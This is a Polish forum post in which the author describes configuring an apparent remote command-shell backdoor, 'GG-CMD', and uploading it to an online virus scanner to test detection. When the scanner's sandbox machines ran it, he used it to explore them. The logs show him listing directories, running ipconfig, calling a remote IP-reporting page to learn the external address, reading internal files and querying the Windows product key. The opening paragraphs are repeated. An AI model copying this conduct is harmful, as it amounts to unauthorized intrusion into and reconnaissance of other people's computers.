hxv
Były Moderator
- Dołączył
- Sierpień 9, 2006
- Posty
- 797
Dobra, będzie długo więc postaram się to w miarę uporządkować i pisać z sensem.
Otóż postanowiłem pobawić się programami Małego (reklama xD). Pobrałem GG-CMD, skonfigurowałem i wysłałem na http://virusscan.jotti.org/ aby sprawdzić wykrywalność. Ku mojemu zdziwieniu program się uruchomił! Nastąpiło to po około 10 minutach od wysłania do skanu i nikt tego programu nie uruchamiał (nawet ja). Pierwsza moja reakcja wyglądała tak:
W tym momencie połączenie się zakończyło. Zwróćcie uwagę że to angielska wersja systemu. Postanowiłem skonfigurować jeszcze raz i wysłać.
Po pewnym czasie znów się udało, tym razem po rozmowie z Małym byłem przygotowany:
Tutaj program się wyłączył. Mały dał mi kod php aby uzyskać zewnętrzny IP. Następna próba:
Kolejne urwane połączenie. Ale mieliśmy już IP: 64.128.133.131 (64-128-133-131.static.twtelecom.net) oraz wiedzieliśmy, że tym razem program został uruchomiony na innym PC (numer seryjny dysku).
Mały był ciekawy co jest w katalogu analysis. Proszę bardzo, da się zrobić:
Przy kolejnej próbie postanowiłem wyświetlić zawartość jakiegoś pliku:
Na moje oko to jakiś automatyczny system. Ale postanowiłem się bawić dalej. Próby wysłania plików na ftp sie nie powiodły
Za to zrobiłem coś innego:
Udało się, nie było żadnych błędów. Podejrzane, idzie za łatwo. Próbowałem pobrać kolejną kopię programu i szybko ją uruchomić z nadzieją że ta się sama nie wyłączy. Nic z tego.
Jednak stało się coś dziwniejszego:
Wybaczcie te szczegółowe listingi ale może ktoś znajdzie coś ciekawego.
Jak widać program uruchomił administrator (z pulpitu)! W kolejnej próbie nic ciekawego nie zrobiłem, ale wysłałem do kolejki takie coś:
Zobaczymy, czy się odezwie ^^
Wybaczcie że tak długo ale nie chciałem nic pominąć.
I teraz pytania: co o tym sądzicie? Czy to dziwne? Też coś takiego się wam zdarzyło xD? Czy to kontynuować ;]?
I jeszcze jedno: teraz wiem na 100% - żaden plik wysłany do przeskanowania nie zostanie pominięty, nie ma co liczyć że uda się uchronić przed zwiększoną wykrywalnością.
Otóż postanowiłem pobawić się programami Małego (reklama xD). Pobrałem GG-CMD, skonfigurowałem i wysłałem na http://virusscan.jotti.org/ aby sprawdzić wykrywalność. Ku mojemu zdziwieniu program się uruchomił! Nastąpiło to po około 10 minutach od wysłania do skanu i nikt tego programu nie uruchamiał (nawet ja). Pierwsza moja reakcja wyglądała tak:
Kod:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
C:\>ze co? xD
'ze' is not recognized as an internal or external command,
operable program or batch file.
C:\>
C:\>dir
Volume in drive C has no label.
Volume Serial Number is A086-CCC6
Directory of C:\
05/27/2008 03:57 PM <DIR> analysis
01/31/2008 01:14 PM 0 AUTOEXEC.BAT
07/31/2007 02:21 PM 81,920 ClickInstall.exe
01/31/2008 01:14 PM 0 CONFIG.SYS
01/31/2008 01:25 PM 0 dfinstall.log
01/31/2008 01:20 PM <DIR> Documents and Settings[/b]
Po pewnym czasie znów się udało, tym razem po rozmowie z Małym byłem przygotowany:
Kod:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
C:\>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.1.210
Subnet Mask . . . . . . . . . . . : 255.255.252.0
IP Address. . . . . . . . . . . . : 2001:5c0:96c8:0:e183:7bb4:39ca:7
IP Address. . . . . . . . . . . . : 2001:5c0:96c8:0:2e0:4dff:fe28:aeb3
Kod:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
C:\>start [url]http://site/ip.php[/url]
C:\>
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 142C-0C24
Mały był ciekawy co jest w katalogu analysis. Proszę bardzo, da się zrobić:
Kod:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>dir /B C:\analysis
analysis.dtd
bodytemplate.txt
CWDllLoader.exe
database.cfg
(16:16)
HTMLReport.xslt
libcurl.dll
libeay32.dll
libmysql40.dll
log
msvcr71.dll
NotificationMail.txt
ntwdblib.dll
ssleay32.dll
TXTReport.xslt
ViewAnalysis.xslt
ViewAnalysisText.xslt
zlib1.dll
C:\>
Kod:
C:\>type C:\analysis\NotificationMail.txt
Submitted file: [SUBMISSION_FILENAME]
Analysis ID: [ANALYSIS_ID]
Sample ID: [SAMPLE_ID]
Submission ID: [SUBMISSION_ID]
Your comment: [SUBMISSION_COMMENT]
Analysis result: [ANALYSIS_RESULT]
<ANALYSIS_OK>
Your submitted sample has been successfully analyzed.
You can find the report at [url]http://yourwebinterface.com/?page=samdet&id=[/url][SAMPLE_ID]&password=[SAMPLE_PASSWORD].
<FILENAME_DIFFERENT>
Please notice, that your submitted file was already submitted before with a different filename. Always the filename of the first submission is used during the analysis.
</FILENAME_DIFFERENT>
</ANALYSIS_OK>
<ANALYSIS_ERROR>
During the analysis of your submitted sample, an error has occurred.
Error: [ANALYSIS_RESULT]
</ANALYSIS_ERROR>
Kod:
C:\>reg query "HKLM\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion" /v DigitalProductId
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion
DigitalProductId REG_BINARY A4....48
Jednak stało się coś dziwniejszego:
Kod:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
C:\Documents and Settings\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1465-AF29
Directory of C:\Documents and Settings\Administrator\Desktop
05/28/2008 02:18 PM <DIR> .
05/28/2008 02:18 PM <DIR> ..
05/09/2008 02:01 PM <DIR> BASH_80
05/02/2006 03:07 PM 2,601,089 BB.exe
06/05/2006 03:07 PM 110,592 bbMultiThreat.exe
04/24/2007 04:39 PM 516 BhoMonitor.exe.lnk
05/13/2008 02:38 PM <DIR> downloader links
05/28/2008 02:18 PM 440,872 gg-cmd.exe
05/20/2008 03:17 PM <DIR> logs
05/12/2008 05:35 PM <DIR> Tracing
05/18/2006 11:16 AM 2,530,816 WReCK2KD.exe
5 File(s) 5,683,885 bytes
6 Dir(s) 1,149,100,032 bytes free
C:\Documents and Settings\Administrator\Desktop>
C:\Documents and Settings\Administrator\Desktop>cd logs
C:\Documents and Settings\Administrator\Desktop\logs>
C:\Documents and Settings\Administrator\Desktop\logs>dir
Volume in drive C has no label.
Volume Serial Number is 1465-AF29
Directory of C:\Documents and Settings\Administrator\Desktop\logs
05/28/2008 02:18 PM <DIR> .
05/28/2008 02:18 PM <DIR> ..
05/19/2008 03:57 PM 5,104 cmd.exe-1744-{A86A378B-9458-4571-AD94-636E38C48991}.txt
05/28/2008 02:18 PM 5,142 gg-cmd.exe-352-{1D5BD88A-4D37-4234-B37C-36A550DB6BF1}.txt
05/28/2008 02:18 PM 5,142 gg-cmd.exe-352-{EDE5533B-E590-4D22-B9C2-415B4CDE7A5D}.txt
05/20/2008 03:17 PM 5,492 inctrl5.exe-500-{443AE05F-7345-4594-99DB-B9DABD91EA73}.txt
05/12/2008 05:32 PM 5,150 traceview.exe-252-{AED95AD1-1AD6-4B33-9B64-B3AC3E5366B1}.txt
05/12/2008 03:07 PM 5,115 wmiprvse.exe-456-{36515513-3A4D-4DAD-8875-09872F16C98C}.txt
05/12/2008 03:07 PM 5,111 wuauclt.exe-1804-{E1332182-AF1E-4F21-8F22-4CCB7B2F0265}.txt
7 File(s) 36,256 bytes
2 Dir(s) 1,145,417,728 bytes free
C:\Documents and Settings\Administrator\Desktop\logs>
C:\Documents and Settings\Administrator\Desktop\logs>type gg-cmd.exe-352-{1D5BD88A-4D37-4234-B37C-36A550DB6BF1}.txt
ShieldID = {CE4081E2-7A4F-4948-A259-AC3554870218}
version = 1
processData.runCount = 1
processData.scoreCount = 1
processData.prod_valid = 175
processData.prod_malicous = 240
processData.prod_normalized = -1
processData.prod_previous = -1
processData.prod_logicVersion = 512
processData.prod_weightsVersion = 512
processData.test_valid = 201
processData.test_malicous = 205
processData.test_normalized = -1
processData.test_previous = -1
processData.test_logicVersion = 256
processData.test_weightsVersion = 256
processData.remediateVersion = 0
processData.recommendRemediate = 0
processData.directoryFilter = 0
pid = 352
(21:20)
ppid = 1916
imagePath = c:\documents and settings\administrator\desktop\
imageName = gg-cmd.exe
sessionId = 0
imageSize = 440872
isHidden = 0
isTrojanName = 0
folderDepth = 3
isInPath = 0
imagePathTestResults = 0
procNameInPath = 0
verNmMatchImgNm = 0
vendorInPath = 0
hasSpecialChars = 0
conformsTo83 = 1
suspiciousImgName = 0
authByAssoc = 0
fileVerInfo.vers = 1
fileVerInfo.hasVersionInfo = 0
inRegistryAppPaths = 0
registryDefaultIcon = 0
isInAddRemoveDirectory = 0
isMultiSvcExe = 0
regprofile.version = 1
regprofile.inferredCompanyName = 0
regprofile.foundCompName = 0
regprofile.foundProdName = 0
regprofile.foundBaseName = 0
regprofile.foundProdVer = 0
(21:21)
regprofile.foundImagePath = 0
regprofile.foundPrinter = 0
msiStatus = 0
parentIsVisible = 0
sfcStatus = 0
titleIsShortcut = 0
isPossibleScreenSaver = 0
isPrintDriverFile = 0
isPrinterFromCompany = 0
I18NTest = 0
isUpxPacked = 0
isSigned = 0
isBoundExe = 0
hasStartupEntry = 0
hasShellPb = 0
inStartupFiles = 0
inStartMenu = 0
inQuickLaunch = 0
fileCt.version = 1
fileCt.procName = 0
fileCt.verCompany = 0
fileCt.verFName = 0
resCt.version = 1
Jak widać program uruchomił administrator (z pulpitu)! W kolejnej próbie nic ciekawego nie zrobiłem, ale wysłałem do kolejki takie coś:
Kod:
echo I see you xD. Mail me: [email][email protected][/email] , i want to know how do you get this prog :P > read.txt
Wybaczcie że tak długo ale nie chciałem nic pominąć.
I teraz pytania: co o tym sądzicie? Czy to dziwne? Też coś takiego się wam zdarzyło xD? Czy to kontynuować ;]?
I jeszcze jedno: teraz wiem na 100% - żaden plik wysłany do przeskanowania nie zostanie pominięty, nie ma co liczyć że uda się uchronić przed zwiększoną wykrywalnością.